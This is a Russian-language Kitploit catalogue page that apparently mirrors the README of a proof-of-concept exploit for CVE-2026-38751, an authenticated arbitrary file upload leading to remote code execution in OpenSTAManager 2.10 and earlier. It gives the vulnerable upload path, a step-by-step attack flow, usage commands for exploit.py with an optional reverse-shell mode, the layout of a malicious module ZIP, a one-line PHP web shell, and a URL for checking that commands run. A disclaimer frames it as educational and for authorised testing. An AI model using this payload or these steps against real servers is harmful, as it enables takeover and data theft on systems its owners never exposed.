Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE). | Kitploit
Инструменты/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE).

Репозиторий
1 месяц назадЕщё не проверено
Поделиться

CVE-2026-38751 – Произвольная загрузка файлов в OpenSTAManager (PoC)

Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2026-38751, затрагивающий OpenSTAManager ≤ 2.10.
Уязвимость позволяет аутентифицированному злоумышленнику загрузить вредоносный модуль через функциональность обновления модулей, что приводит к произвольной загрузке файлов и удалённому выполнению кода (RCE).

Ссылка CVE

  • Запись CVE MITRE (первая запись раскрытия): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • База данных уязвимостей NVD (NIST): https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • База данных рекомендаций GitHub https://github.com/advisories/GHSA-rm34-fg4m-39mw

Затронутое ПО

  • OpenSTAManager ≤ 2.10
  • Система обновления модулей (modules/aggiornamenti/upload_modules.php)

Описание уязвимости

Функциональность обновления модулей позволяет аутентифицированным пользователям загружать ZIP-модули без надлежащей проверки содержимого файлов или границ выполнения.
Злоумышленник может создать вредоносный модуль, содержащий PHP-полезные нагрузки, которые затем развёртываются в корневой директории веб-сервера и выполняются в контексте приложения.
Это приводит к:

  • Произвольной загрузке файлов (CWE-434)
  • Удалённому выполнению кода через загруженные PHP-файлы
  • Полной компрометации контекста приложения

Схема атаки (высокоуровневая)

  1. Аутентификация в OpenSTAManager
  2. Загрузка сконструированного ZIP-архива модуля
  3. Запуск процесса установки/обновления модуля
  4. Доступ к загруженной PHP-полезной нагрузке через корневую директорию веб-сервера
  5. Выполнение произвольных команд на сервере

Влияние

Успешная эксплуатация позволяет:

  • Удалённое выполнение команд
  • Компрометацию веб-сервера
  • Утечку данных
  • Полный захват приложения в зависимости от привилегий

Требования

  • Действительная учётная запись аутентифицированного пользователя
  • Доступ к включённой функциональности обновления модулей

Использование (PoC)

  1. Создать вредоносный модуль
root@kitploit:~
python exploit.py --build

Создаёт:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Запустить эксплойт
root@kitploit:~
python exploit.py <username> <password> <target_url>

Опциональный режим обратной оболочки:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Пример полезной нагрузки

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Проверка

В случае успеха следующая конечная точка выполняет системные команды: /modules/run/evil.php?cmd=id

Ссылки MITRE / NVD

  • Запись CVE MITRE: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Запись NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Отказ от ответственности

Этот проект предназначен для:

  • Образовательных целей
  • Авторизованного тестирования безопасности
  • Исследовательских сред

Не используйте против систем без явного разрешения.

Примечания

Обнаружение может различаться в зависимости от конфигурации сервера. В некоторых развёртываниях прямое выполнение PHP в каталогах модулей может быть отключено. Время активации модуля может потребовать повторных попыток.

Благодарности

  • Программа CVE MITRE
  • Национальная база данных уязвимостей NIST (NVD)
  • Сопровождающие проекта OpenSTAManager
  • https://github.com/fuutianyii/poc (Первое PoC)
Скачать инструмент